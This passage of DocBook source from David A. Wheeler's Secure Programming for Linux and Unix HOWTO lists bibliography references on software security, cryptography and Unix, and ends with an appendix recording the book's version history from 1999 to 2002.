March 30, 2001.
Hardening Windows 2000.
<ulink url="http://www.systemexperts.com/win2k/hardenW2K11.pdf">http://www.systemexperts.com/win2k/hardenW2K11.pdf</ulink>.
<!-- http://www.systemexperts.com/win2k.shtml -->
</para>

<para>
[Dobbertin 1996].
Dobbertin, H.
1996.
The Status of MD5 After a Recent Attack.
RSA Laboratories' CryptoBytes.
Vol. 2, No. 2.
</para>

<para>
[Felten 1997]
Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach.
Web Spoofing: An Internet Con Game
Technical Report 540-96 (revised Feb. 1997)
Department of Computer Science, Princeton University
<ulink url="http://www.cs.princeton.edu/sip/pub/spoofing.pdf">
http://www.cs.princeton.edu/sip/pub/spoofing.pdf
</ulink>
</para>


<para>
[Fenzi 1999]
Fenzi, Kevin, and Dave Wrenski.
April 25, 1999.
<emphasis remap="it">Linux Security HOWTO</emphasis>.
Version 1.0.2.
<ulink
url="http://www.tldp.org/HOWTO/Security-HOWTO.html">http://www.tldp.org/HOWTO/Security-HOWTO.html</ulink>
</para>

<para>
[FHS 1997]
Filesystem Hierarchy Standard (FHS 2.0).
October 26, 1997.
Filesystem Hierarchy Standard Group, edited by Daniel Quinlan.
Version 2.0.
<ulink
url="http://www.pathname.com/fhs">http://www.pathname.com/fhs</ulink>.
</para>

<para>
[Filipski 1986]
Filipski, Alan and James Hanko.
April 1986.
``Making Unix Secure.''
Byte (Magazine).
Peterborough, NH: McGraw-Hill Inc.
Vol. 11, No. 4.
ISSN 0360-5280.
pp. 113-128.
</para>

<para>
[Flake 2001]
Flake, Havlar.
Auditing Binaries for Security Vulnerabilities.
<ulink url="http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html">http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html</ulink>.
</para>

<para>
[FOLDOC]
Free On-Line Dictionary of Computing.
<ulink
url="http://foldoc.doc.ic.ac.uk/foldoc/index.html">
http://foldoc.doc.ic.ac.uk/foldoc/index.html</ulink>.
</para>

<para>
[Forristal 2001]
Forristal, Jeff, and Greg Shipley.
January 8, 2001.
Vulnerability Assessment Scanners.
Network Computing.
<ulink url="http://www.nwc.com/1201/1201f1b1.html">http://www.nwc.com/1201/1201f1b1.html</ulink>
</para>

<para>
[FreeBSD 1999]
FreeBSD, Inc.
1999.
``Secure Programming Guidelines''.
<emphasis remap="it">FreeBSD Security Information</emphasis>.
<ulink
url="http://www.freebsd.org/security/security.html">http://www.freebsd.org/security/security.html</ulink>
</para>

<para>
[Friedl 1997]
Friedl, Jeffrey E. F.
1997.
Mastering Regular Expressions.
O'Reilly.
ISBN 1-56592-257-3.
</para>

<para>
[FSF 1998]
Free Software Foundation.
December 17, 1999.
<emphasis remap="it">Overview of the GNU Project</emphasis>.
<ulink
url="http://www.gnu.ai.mit.edu/gnu/gnu-history.html">http://www.gnu.ai.mit.edu/gnu/gnu-history.html</ulink>
</para>

<para>
[FSF 1999]
Free Software Foundation.
January 11, 1999.
<emphasis remap="it">The GNU C Library Reference Manual</emphasis>.
Edition 0.08 DRAFT, for Version 2.1 Beta of the GNU C Library.
Available at, for example,
<ulink url="http://www.netppl.fi/~pp/glibc21/libc_toc.html">http://www.netppl.fi/~pp/glibc21/libc_toc.html</ulink>
</para>

<para>
[Fu 2001]
Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster.
August 2001.
``Dos and Don'ts of Client Authentication on the Web''.
Proceedings of the 10th USENIX Security Symposium,
Washington, D.C., August 2001.
<ulink url="http://cookies.lcs.mit.edu/pubs/webauth.html">
http://cookies.lcs.mit.edu/pubs/webauth.html</ulink>.
</para>

<para>
[Gabrilovich 2002]
Gabrilovich, Evgeniy, and Alex Gontmakher.
February 2002.
``Inside Risks: The Homograph Attack''.
Communications of the ACM.
Volume 45, Number 2.
Page 128.

</para>

<para>
[Galvin 1998a]
Galvin, Peter.
April 1998.
``Designing Secure Software''.
<emphasis remap="it">Sunworld</emphasis>.
<ulink
url="http://www.sunworld.com/swol-04-1998/swol-04-security.html">http://www.sunworld.com/swol-04-1998/swol-04-security.html</ulink>.
</para>

<para>
[Galvin 1998b]
Galvin, Peter.
August 1998.
``The Unix Secure Programming FAQ''.
<emphasis remap="it">Sunworld</emphasis>.
<ulink
url="http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html">http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html</ulink>
</para>

<para>
[Garfinkel 1996]
Garfinkel, Simson and Gene Spafford.
April 1996.
<emphasis remap="it">Practical UNIX &amp; Internet Security, 2nd Edition</emphasis>.
ISBN 1-56592-148-8.
Sebastopol, CA: O'Reilly &amp; Associates, Inc.
<ulink
url="http://www.oreilly.com/catalog/puis">http://www.oreilly.com/catalog/puis</ulink>
</para>

<para>
[Garfinkle 1997]
Garfinkle, Simson.
August 8, 1997.
21 Rules for Writing Secure CGI Programs.
<ulink url="http://webreview.com/wr/pub/97/08/08/bookshelf">
http://webreview.com/wr/pub/97/08/08/bookshelf</ulink>
</para>

<para>
[Gay 2000]
Gay, Warren W.
October 2000.
Advanced Unix Programming.
Indianapolis, Indiana: Sams Publishing.
ISBN 0-67231-990-X.
</para>

<para>
[Geodsoft 2001]
Geodsoft.
February 7, 2001.
Hardening OpenBSD Internet Servers.
<ulink url="http://www.geodsoft.com/howto/harden">http://www.geodsoft.com/howto/harden</ulink>.
</para>


<para>
[Graham 1999]
Graham, Jeff.
May 4, 1999.
<emphasis remap="it">Security-Audit's Frequently Asked Questions (FAQ)</emphasis>.
<ulink
url="http://lsap.org/faq.txt">http://lsap.org/faq.txt</ulink>
</para>

<para>
[Gong 1999]
Gong, Li.
June 1999.
<emphasis remap="it">Inside Java 2 Platform Security</emphasis>.
Reading, MA: Addison Wesley Longman, Inc.
ISBN 0-201-31000-7.
</para>

<para>
[Gundavaram Unknown]
Gundavaram, Shishir, and Tom Christiansen.
Date Unknown.
<emphasis remap="it">Perl CGI Programming FAQ</emphasis>.
<ulink
url="http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html">http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html</ulink>
</para>

<para>
[Hall 1999]
Hall, Brian "Beej".
Beej's Guide to Network Programming Using Internet Sockets.
13-Jan-1999.
Version 1.5.5.
<ulink url="http://www.ecst.csuchico.edu/~beej/guide/net">http://www.ecst.csuchico.edu/~beej/guide/net</ulink>
</para>

<para>
[Howard 2002]
Howard, Michael and David LeBlanc.
2002.
Writing Secure Code.
Redmond, Washington: Microsoft Press.
ISBN 0-7356-1588-8.
</para>

<para>
[ISO 12207]
International Organization for Standardization (ISO).
1995.
Information technology -- Software life cycle processes
ISO/IEC 12207:1995.
<!-- http://www.iso.ch/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=21208&ICS1=35&ICS2=80&ICS3= -->
</para>

<para>
[ISO 13335]
International Organization for Standardization (ISO).
ISO/IEC TR 13335.
Guidelines for the Management of IT Security (GMITS).
<!-- This is a technical report, not a standard -->
Note that this is a five-part technical report (not a standard); see also
ISO/IEC 17799:2000.
It includes:
<itemizedlist>
<listitem><para>
         ISO 13335-1: Concepts and Models for IT Security
</para></listitem>
<listitem><para>
         ISO 13335-2: Managing and Planning IT Security
</para></listitem>
<listitem><para>
         ISO 13335-3: Techniques for the Management of IT Security
</para></listitem>
<listitem><para>
         ISO 13335-4: Selection of Safeguards
</para></listitem>
<listitem><para>
         ISO 13335-5: Safeguards for External Connections
</para></listitem>
</itemizedlist>
</para>

<para>
[ISO 17799]
International Organization for Standardization (ISO).
December 2000.
Code of Practice for Information Security Management.
ISO/IEC 17799:2000.
</para>

<para>
[ISO 9000]
International Organization for Standardization (ISO).
2000.
Quality management systems - Fundamentals and vocabulary.
ISO 9000:2000.
See
<ulink url="http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html">
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html</ulink>
</para>

<para>
[ISO 9001]
International Organization for Standardization (ISO).
2000.
Quality management systems - Requirements
ISO 9001:2000
</para>

<para>
[Jones 2000]
Jones, Jennifer.
October 30, 2000.
``Banking on Privacy''.
InfoWorld, Volume 22, Issue 44.
San Mateo, CA: International Data Group (IDG).
pp. 1-12.
</para>

<para>
[Kelsey 1998]
Kelsey, J., B. Schneier, D. Wagner, and C. Hall.
March 1998.
"Cryptanalytic Attacks on Pseudorandom Number Generators."
Fast Software Encryption, Fifth International Workshop Proceedings
(March 1998), Springer-Verlag, 1998, pp. 168-188.
<ulink url="http://www.counterpane.com/pseudorandom_number.html">
http://www.counterpane.com/pseudorandom_number.html</ulink>.
</para>

<para>
[Kernighan 1988]
Kernighan, Brian W., and Dennis M. Ritchie.
1988.
<emphasis remap="it">The C Programming Language</emphasis>.
Second Edition.
Englewood Cliffs, NJ: Prentice-Hall.
ISBN 0-13-110362-8.
</para>

<para>
[Kim 1996]
Kim, Eugene Eric.
1996.
<emphasis remap="it">CGI Developer's Guide</emphasis>.
SAMS.net Publishing.
ISBN: 1-57521-087-8
<ulink
url="http://www.eekim.com/pubs/cgibook">http://www.eekim.com/pubs/cgibook</ulink>
</para>

<para>
Kolsek [2002]
Kolsek, Mitja. December 2002.
Session Fixation Vulnerability in Web-based Applications
<ulink url="http://www.acros.si/papers/session_fixation.pdf">
http://www.acros.si/papers/session_fixation.pdf</ulink>.
</para>

<para>
[Kuchling 2000].
Kuchling, A.M.
2000.
Restricted Execution HOWTO.
<ulink url="http://www.python.org/doc/howto/rexec/rexec.html">http://www.python.org/doc/howto/rexec/rexec.html</ulink>
</para>

<para>
[Kuhn 2002]
Kuhn, Markus G.
Optical Time-Domain Eavesdropping Risks
of CRT displays.
Proceedings of the 2002 IEEE Symposium on Security and Privacy,
Oakland, CA, May 12-15, 2002.
<ulink url="http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf">
http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf</ulink>
</para>

<para>
[LSD 2001]
The Last Stage of Delirium.
July 4, 2001.
<emphasis remap="it">UNIX Assembly Codes Development
for Vulnerabilities Illustration Purposes.</emphasis>
<ulink url="http://lsd-pl.net/papers.html#assembly">http://lsd-pl.net/papers.html#assembly</ulink>.
</para>

<para>
[McClure 1999]
McClure, Stuart, Joel Scambray, and George Kurtz.
1999.
<emphasis remap="it">Hacking Exposed: Network Security Secrets and Solutions</emphasis>.
Berkeley, CA: Osbourne/McGraw-Hill.
ISBN 0-07-212127-0.
</para>

<para>
[McKusick 1999]
McKusick, Marshall Kirk.
January 1999.
``Twenty Years of Berkeley Unix: From AT&amp;T-Owned to
Freely Redistributable.''
<emphasis remap="it">Open Sources: Voices from the Open Source Revolution</emphasis>.
<ulink
url="http://www.oreilly.com/catalog/opensources/book/kirkmck.html">http://www.oreilly.com/catalog/opensources/book/kirkmck.html</ulink>.
</para>

<para>
[McGraw 1999]
McGraw, Gary, and Edward W. Felten.
December 1998.
Twelve Rules for developing more secure Java code.
Javaworld.
<ulink url="http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html">http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html</ulink>.
</para>

<para>
[McGraw 1999]
McGraw, Gary, and Edward W. Felten.
January 25, 1999.
Securing Java: Getting Down to Business with Mobile Code, 2nd Edition
John Wiley &amp; Sons.
ISBN 047131952X.
<ulink url="http://www.securingjava.com">http://www.securingjava.com</ulink>.
</para>

<para>
[McGraw 2000a]
McGraw, Gary and John Viega.
March 1, 2000.
Make Your Software Behave: Learning the Basics of Buffer Overflows.
<ulink
url="http://www-4.ibm.com/software/developer/library/overflows/index.html">http://www-4.ibm.com/software/developer/library/overflows/index.html</ulink>.
</para>

<para>
[McGraw 2000b]
McGraw, Gary and John Viega.
April 18, 2000.
Make Your Software Behave: Software strategies
In the absence of hardware,
you can devise a reasonably secure random number generator through software.
<ulink url="http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security">http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security</ulink>.
</para>

<para>
[Miller 1995]
Miller, Barton P.,
David Koski, Cjin Pheow Lee, Vivekananda Maganty,
Ravi Murthy, Ajitkumar Natarajan, and Jeff Steidl.
1995.
Fuzz Revisited: A Re-examination of the Reliability of
UNIX Utilities and Services.
<ulink url="ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf">ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf</ulink>.
</para>

<para>
[Miller 1999]
Miller, Todd C. and Theo de Raadt.
``strlcpy and strlcat -- Consistent, Safe, String Copy and Concatenation''
<emphasis remap="it">Proceedings of Usenix '99</emphasis>.
<ulink
url="http://www.usenix.org/events/usenix99/millert.html">http://www.usenix.org/events/usenix99/millert.html</ulink> and
<ulink
url="http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST">http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST</ulink>
</para>

<para>
[Mookhey 2002]
Mookhey, K. K.
The Unix Auditor's Practical Handbook.
<ulink url="http://www.nii.co.in/tuaph.html">http://www.nii.co.in/tuaph.html</ulink>.
</para>

<para>
[Mudge 1995]
Mudge.
October 20, 1995.
<emphasis remap="it">How to write Buffer Overflows</emphasis>.
l0pht advisories.
<ulink
url="http://www.l0pht.com/advisories/bufero.html">http://www.l0pht.com/advisories/bufero.html</ulink>.
</para>

<para>
[Murhammer 1998]
Murhammer, Martin W., Orcun Atakan, Stefan Bretz,
Larry R. Pugh, Kazunari Suzuki, and David H. Wood.
October 1998.
TCP/IP Tutorial and Technical Overview
IBM International Technical Support Organization.
<ulink url="http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf">http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf</ulink>
</para>

<para>
[NCSA]
NCSA Secure Programming Guidelines.
<ulink url="http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming">http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming</ulink>.
</para>

<para>
[Neumann 2000]
Neumann, Peter.
2000.
"Robust Nonproprietary Software."
Proceedings of the 2000 IEEE Symposium on Security and Privacy
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
Los Alamitos, CA: IEEE Computer Society.
pp.122-123.
</para>

<para>
[NSA 2000]
National Security Agency (NSA).
<!-- Conceivably the author should be listed as the
     Information Assurance Technical Framework Forum (IATFF), but that's
     not what the document cover says. -->
September 2000.
Information Assurance Technical Framework (IATF).
<ulink url="http://www.iatf.net">http://www.iatf.net</ulink>.
</para>

<para>
[Open Group 1997]
The Open Group.
1997.
<emphasis remap="it">Single UNIX Specification, Version 2 (UNIX 98)</emphasis>.
<ulink
url="http://www.opengroup.org/online-pubs?DOC=007908799">http://www.opengroup.org/online-pubs?DOC=007908799</ulink>.
</para>

<para>
[OSI 1999]
Open Source Initiative.
1999.
<emphasis remap="it">The Open Source Definition</emphasis>.
<ulink
url="http://www.opensource.org/osd.html">http://www.opensource.org/osd.html</ulink>.
</para>

<para>
[Opplinger 1998]
Oppliger, Rolf.
1998.
Internet and Intranet Security.
Norwood, MA: Artech House.
ISBN 0-89006-829-1.
</para>

<para>
[Paulk 1993a]
Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V. Weber.
Capability Maturity Model for Software, Version 1.1.
Software Engineering Institute, CMU/SEI-93-TR-24.
DTIC Number ADA263403, February 1993.
<ulink url="http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html">http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html</ulink>.
</para>


<para>
[Paulk 1993b]
Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary Beth Chrissis, and Marilyn W.  Bush.
Key Practices of the Capability Maturity Model, Version 1.1.
Software Engineering Institute.
CMU/SEI-93-TR-25, DTIC Number ADA263432, February 1993.
</para>

<para>
[Peteanu 2000]
Peteanu, Razvan.
July 18, 2000.
Best Practices for Secure Web Development.
<ulink url="http://members.home.net/razvan.peteanu">http://members.home.net/razvan.peteanu</ulink>
</para>

<para>
[Pfleeger 1997]
Pfleeger, Charles P.
1997.
<emphasis remap="it">Security in Computing.</emphasis>
Upper Saddle River, NJ: Prentice-Hall PTR.
ISBN 0-13-337486-6.
</para>

<para>
[Phillips 1995]
Phillips, Paul.
September 3, 1995.
<emphasis remap="it">Safe CGI Programming</emphasis>.
<ulink
url="http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt">http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt</ulink>
</para>

<para>
[Quintero 1999]
Quintero, Federico Mena,
Miguel de Icaza, and Morten Welinder
GNOME Programming Guidelines
<ulink url="http://developer.gnome.org/doc/guides/programming-guidelines/book1.html">http://developer.gnome.org/doc/guides/programming-guidelines/book1.html</ulink>
<!-- http://developer.gnome.org/doc/guides/programming-guidelines/security.html -->
</para>

<para>
[Raymond 1997]
Raymond, Eric.
1997.
<emphasis remap="it">The Cathedral and the Bazaar</emphasis>.
<ulink
url="http://www.catb.org/~esr/writings/cathedral-bazaar">http://www.catb.org/~esr/writings/cathedral-bazaar</ulink>
</para>

<para>
[Raymond 1998]
Raymond, Eric.
April 1998.
<emphasis remap="it">Homesteading the Noosphere</emphasis>.
<ulink
url="http://www.catb.org/~esr/writings/homesteading/homesteading.html">http://www.catb.org/~esr/writings/homesteading/homesteading.html</ulink>
</para>

<para>
[Ranum 1998]
Ranum, Marcus J.
1998.
<emphasis remap="it">Security-critical coding for programmers -
a C and UNIX-centric full-day tutorial</emphasis>.
<ulink
url="http://www.clark.net/pub/mjr/pubs/pdf/">http://www.clark.net/pub/mjr/pubs/pdf/</ulink>.
</para>

<para>
[RFC 822]
August 13, 1982
<emphasis remap="it">Standard for the Format of ARPA Internet Text Messages</emphasis>.
IETF RFC 822.
<ulink
url="http://www.ietf.org/rfc/rfc0822.txt">http://www.ietf.org/rfc/rfc0822.txt</ulink>.
</para>

<para>
[rfp 1999]
rain.forest.puppy.
1999.
``Perl CGI problems''.
<emphasis remap="it">Phrack Magazine</emphasis>.
Issue 55, Article 07.
<ulink
url="http://www.phrack.com/search.phtml?view&amp;article=p55-7">http://www.phrack.com/search.phtml?view&amp;article=p55-7</ulink> or
<ulink url="http://www.insecure.org/news/P55-07.txt">http://www.insecure.org/news/P55-07.txt</ulink>.
</para>

<para>
[Rijmen 2000]
Rijmen, Vincent.
"LinuxSecurity.com Speaks With AES Winner".
<ulink url="http://www.linuxsecurity.com/feature_stories/interview-aes-3.html">http://www.linuxsecurity.com/feature_stories/interview-aes-3.html</ulink>.
</para>

<para>
[Rochkind 1985].
Rochkind, Marc J.
<emphasis>Advanced Unix Programming</emphasis>.
Englewood Cliffs, NJ: Prentice-Hall, Inc.
ISBN 0-13-011818-4.
</para>

<para>
[Sahu 2002]
Sahu, Bijaya Nanda,
Srinivasan S. Muthuswamy,
Satya Nanaji Rao Mallampalli, and
Venkata R. Bonam.
July 2002
``Is your Java code secure -- or exposed?
Build safer applications now to avoid trouble later''
<ulink url="http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain">
http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain
</ulink>
</para>

<para>
[St. Laurent 2000]
St. Laurent, Simon.
February 2000.
<emphasis remap="it">XTech 2000 Conference Reports</emphasis>.
``When XML Gets Ugly''.
<ulink
url="http://www.xml.com/pub/2000/02/xtech/megginson.html">http://www.xml.com/pub/2000/02/xtech/megginson.html</ulink>.
</para>

<para>
[Saltzer 1974]
Saltzer, J.
July 1974.
``Protection and the Control of Information Sharing in MULTICS''.
<emphasis remap="it">Communications of the ACM</emphasis>.
v17 n7.
pp. 388-402.
</para>

<para>
[Saltzer 1975]
Saltzer, J., and M. Schroeder.
September 1975.
``The Protection of Information in Computing Systems''.
<emphasis remap="it">Proceedings of the IEEE</emphasis>.
v63 n9.
pp. 1278-1308.
<ulink
url="http://www.mediacity.com/~norm/CapTheory/ProtInf">http://www.mediacity.com/~norm/CapTheory/ProtInf</ulink>.
Summarized in [Pfleeger 1997, 286].
</para>

<para>
[Schneider 2000]
Schneider, Fred B.
2000.
"Open Source in Security: Visting the Bizarre."
Proceedings of the 2000 IEEE Symposium on Security and Privacy
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
Los Alamitos, CA: IEEE Computer Society.
pp.126-127.
</para>

<para>
[Schneier 1996]
Schneier, Bruce.
1996.
<emphasis remap="it">Applied Cryptography, Second Edition:
Protocols, Algorithms, and Source Code in C</emphasis>.
New York: John Wiley and Sons.
ISBN 0-471-12845-7.
</para>

<para>
[Schneier 1998]
Schneier, Bruce and Mudge.
November 1998.
<emphasis remap="it">Cryptanalysis of Microsoft's Point-to-Point Tunneling Protocol (PPTP)</emphasis>
Proceedings of the 5th ACM Conference on Communications and Computer Security,
ACM Press.
<ulink
url="http://www.counterpane.com/pptp.html">http://www.counterpane.com/pptp.html</ulink>.
</para>

<para>
[Schneier 1999]
Schneier, Bruce.
September 15, 1999.
``Open Source and Security''.
<emphasis remap="it">Crypto-Gram</emphasis>.
Counterpane Internet Security, Inc.
<ulink
url="http://www.counterpane.com/crypto-gram-9909.html">http://www.counterpane.com/crypto-gram-9909.html</ulink>
</para>

<para>
[Seifried 1999]
Seifried, Kurt.
October 9, 1999.
<emphasis remap="it">Linux Administrator's Security Guide</emphasis>.
<ulink
url="http://www.securityportal.com/lasg">http://www.securityportal.com/lasg</ulink>.
</para>

<para>
[Seifried 2001]
Seifried, Kurt.
September 2, 2001.
WWW Authentication
<ulink url="http://www.seifried.org/security/www-auth/index.html">
http://www.seifried.org/security/www-auth/index.html</ulink>.
</para>


<para>
[Shankland 2000]
Shankland, Stephen.
``Linux poses increasing threat to Windows 2000''.
CNET.
<ulink
url="http://news.cnet.com/news/0-1003-200-1549312.html">http://news.cnet.com/news/0-1003-200-1549312.html</ulink>
</para>

<para>
[Shostack 1999]
Shostack, Adam.
June 1, 1999.
<emphasis remap="it">Security Code Review Guidelines</emphasis>.
<ulink
url="http://www.homeport.org/~adam/review.html">http://www.homeport.org/~adam/review.html</ulink>.
</para>

<para>
[Sibert 1996]
Sibert, W. Olin.
Malicious Data and Computer Security.
(NIST) NISSC '96.
<ulink url="http://www.fish.com/security/maldata.html">http://www.fish.com/security/maldata.html</ulink>
</para>

<para>
[Sitaker 1999]
Sitaker, Kragen.
Feb 26, 1999.
<emphasis remap="it">How to Find Security Holes</emphasis>
<ulink
url="http://www.pobox.com/~kragen/security-holes.html">http://www.pobox.com/~kragen/security-holes.html</ulink> and
<ulink
url="http://www.dnaco.net/~kragen/security-holes.html">http://www.dnaco.net/~kragen/security-holes.html</ulink>
</para>

<para>
[SSE-CMM 1999]
SSE-CMM Project.
April 1999.
<emphasis remap="it">Systems Security Engineering Capability Maturity Model (SSE CMM)
Model Description Document</emphasis>.
Version 2.0.
<ulink
url="http://www.sse-cmm.org">http://www.sse-cmm.org</ulink>
</para>

<para>
[Stallings 1996]
Stallings, William.
Practical Cryptography for Data Internetworks.
Los Alamitos, CA: IEEE Computer Society Press.
ISBN 0-8186-7140-8.
</para>

<para>
[Stein 1999].
Stein, Lincoln D.
September 13, 1999.
<emphasis remap="it">The World Wide Web Security FAQ</emphasis>.
Version 2.0.1
<ulink
url="http://www.w3.org/Security/Faq/www-security-faq.html">http://www.w3.org/Security/Faq/www-security-faq.html</ulink>
</para>

<para>
[Swan 2001]
Swan, Daniel.
January 6, 2001.
comp.os.linux.security FAQ.
Version 1.0.
<ulink url="http://www.linuxsecurity.com/docs/colsfaq.html">http://www.linuxsecurity.com/docs/colsfaq.html</ulink>.
</para>

<para>
[Swanson 1996]
Swanson, Marianne, and Barbara Guttman.
September 1996.
Generally Accepted Principles and Practices for Securing
Information Technology Systems.
NIST Computer Security Special Publication (SP) 800-14.
<ulink url="http://csrc.nist.gov/publications/nistpubs/index.html">http://csrc.nist.gov/publications/nistpubs/index.html</ulink>.
</para>

<para>
[Thompson 1974]
Thompson, K. and D.M. Richie.
July 1974.
``The UNIX Time-Sharing System''.
<emphasis remap="it">Communications of the ACM</emphasis>
Vol. 17, No. 7.
pp. 365-375.
<!-- Revised and reprinted in Ritchie 1978a; see Bach 1986 -->
</para>

<para>
[Torvalds 1999]
Torvalds, Linus.
February 1999.
``The Story of the Linux Kernel''.
<emphasis remap="it">Open Sources: Voices from the Open Source Revolution</emphasis>.
Edited by Chris Dibona, Mark Stone, and Sam Ockman.
O'Reilly and Associates.
ISBN 1565925823.
<ulink
url="http://www.oreilly.com/catalog/opensources/book/linus.html">http://www.oreilly.com/catalog/opensources/book/linus.html</ulink>
</para>

<para>
[TruSecure 2001]
TruSecure.
August 2001.
Open Source Security: A Look at the Security Benefits of Source Code Access.
<ulink url="http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf">http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf</ulink>
</para>

<para>
[Unknown]
<emphasis remap="it">SETUID(7)</emphasis>
<ulink
url="http://www.homeport.org/~adam/setuid.7.html">http://www.homeport.org/~adam/setuid.7.html</ulink>.
<!-- Claimed to be from Dan Farmer's COPS, but COPS does not include it. -->
</para>

<para>
[Van Biesbrouck 1996]
Van Biesbrouck, Michael.
April 19, 1996.
<ulink url="http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec">http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec</ulink>.
</para>

<para>
[van Oorschot 1994]
van Oorschot, P. and M. Wiener.
November 1994.
``Parallel Collision Search with Applications to Hash Functions
and Discrete Logarithms.''
Proceedings of ACM Conference on Computer and Communications Security.
</para>

<para>
[Venema 1996]
Venema, Wietse.
1996.
Murphy's law and computer security.
<ulink url="http://www.fish.com/security/murphy.html">http://www.fish.com/security/murphy.html</ulink>
</para>

<para>
[Viega 2002]
Viega, John, and Gary McGraw.
2002.
Building Secure Software.
Addison-Wesley.
ISBN 0201-72152-X.
</para>

<para>
[Watters 1996]
Watters, Arron, Guido van Rossum, James C. Ahlstrom.
1996.
Internet Programming with Python.
NY, NY: Henry Hold and Company, Inc.
</para>

<para>
[Wheeler 1996]
Wheeler, David A., Bill Brykczynski, and Reginald N. Meeson, Jr.
Software Inspection: An Industry Best Practice.
1996.
Los Alamitos, CA: IEEE Computer Society Press.
IEEE Copmuter Society Press Order Number BP07340.
Library of Congress Number 95-41054.
ISBN 0-8186-7340-0.
</para>

<para>
[Witten 2001]
September/October 2001.
Witten, Brian, Carl Landwehr, and Michael Caloyannides.
``Does Open Source Improve System Security?''
IEEE Software.
pp. 57-61.
<ulink url="http://www.computer.org/software">http://www.computer.org/software</ulink>

</para>

<para>
[Wood 1985]
Wood, Patrick H. and Stephen G. Kochan.
1985.
<emphasis remap="it">Unix System Security</emphasis>.
Indianapolis, Indiana: Hayden Books.
ISBN 0-8104-6267-2.
</para>

<para>
[Wreski 1998]
Wreski, Dave.
August 22, 1998.
<emphasis remap="it">Linux Security Administrator's Guide</emphasis>.
Version 0.98.
<ulink
url="http://www.nic.com/~dave/SecurityAdminGuide/index.html">http://www.nic.com/~dave/SecurityAdminGuide/index.html</ulink>
</para>

<para>
[Yoder 1998]
Yoder, Joseph and Jeffrey Barcalow.
1998.
Architectural Patterns for Enabling Application Security.
PLoP '97
<ulink url="http://st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf">
http://st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf</ulink>
</para>

<para>
[Zalewski 2001]
Zalewski, Michael.
May 16-17, 2001.
Delivering Signals for Fun and Profit:
Understanding, exploiting and preventing signal-handling related
vulnerabilities.
Bindview Corporation.
<ulink url="http://razor.bindview.com/publish/papers/signals.txt">http://razor.bindview.com/publish/papers/signals.txt</ulink>
</para>

<para>
[Zoebelein 1999]
Zoebelein, Hans U.
April 1999.
The Internet Operating System Counter.
<ulink url="http://www.leb.net/hzo/ioscount">http://www.leb.net/hzo/ioscount</ulink>.
</para>

</chapter>

<appendix id="document-history">
<title>History</title>
<para>
Here are a few key events in the development of this book, starting
from most recent events:

<variablelist>

<varlistentry><term>
2002-10-29 David A. Wheeler
</term>
<listitem>
<para>
Version 3.000 released, adding a new section on determining
security requirements and a discussion of the Common Criteria,
broadening the document.
Many smaller improvements were incorporated as well.
</para>
</listitem>
</varlistentry>

<varlistentry><term>
2001-01-01 David A. Wheeler
</term>
<listitem>
<para>
Version 2.70 released, adding a significant amount of additional material,
such as a significant expansion of the discussion of cross-site
malicious content, HTML/URI filtering, and handling temporary files.
</para>
</listitem>
</varlistentry>

<varlistentry><term>
2000-05-24 David A. Wheeler
</term>
<listitem>
<para>
Switched to GNU's GFDL license, added more content.
</para>
</listitem>
</varlistentry>

<varlistentry><term>
2000-04-21 David A. Wheeler
</term>
<listitem>
<para>
Version 2.00 released, dated 21 April 2000, which switched the
document's internal format from the Linuxdoc DTD to the DocBook DTD.
Thanks to Jorge Godoy for helping me perform the transition.
</para>
</listitem>
</varlistentry>


<varlistentry><term>
2000-04-04 David A. Wheeler
</term>
<listitem>
<para>
Version 1.60 released;
changed so that it now covers <emphasis>both</emphasis> Linux and Unix.
Since most of the guidelines covered both, and many/most app developers want
their apps to run on both, it made sense to cover both.
</para>
</listitem>
</varlistentry>

<varlistentry><term>
2000-02-09 David A. Wheeler
</term>
<listitem>
<para>
Noted that the document is now part of the Linux Documentation Project (LDP).
</para>
</listitem>
</varlistentry>

<varlistentry><term>
1999-11-29 David A. Wheeler
</term>
<listitem>
<para>
Initial version (1.0) completed and released to the public.
</para>
</listitem>
</varlistentry>

</variablelist>
</para>

<para>
Note that a more detailed description of changes is available on-line
in the ``ChangeLog'' file.
</para>
</appendix>

